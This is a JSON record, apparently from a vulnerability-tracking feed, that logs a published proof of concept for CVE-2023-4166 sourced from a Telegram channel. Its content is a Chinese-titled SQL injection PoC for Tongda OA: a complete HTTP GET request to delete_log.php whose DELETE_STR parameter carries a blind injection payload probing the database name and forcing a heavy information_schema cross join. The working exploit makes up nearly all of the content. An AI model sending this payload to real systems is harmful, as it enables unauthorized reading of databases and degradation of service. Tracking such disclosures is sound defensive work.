{"uuid": "7efbc9fa-f934-4f37-a138-57f83af8023c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4166", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/857", "content": "\u901a\u8fbeOA sql\u6ce8\u5165\u6f0f\u6d1e CVE-2023-4166 POC\n\nGET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1\nHost: 127.0.0.1:8080\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n2023  \ud83c\udde8\ud83c\uddf3\u62a4\u7f51poc \n#poc", "creation_timestamp": "2023-10-10T15:06:55.000000Z"}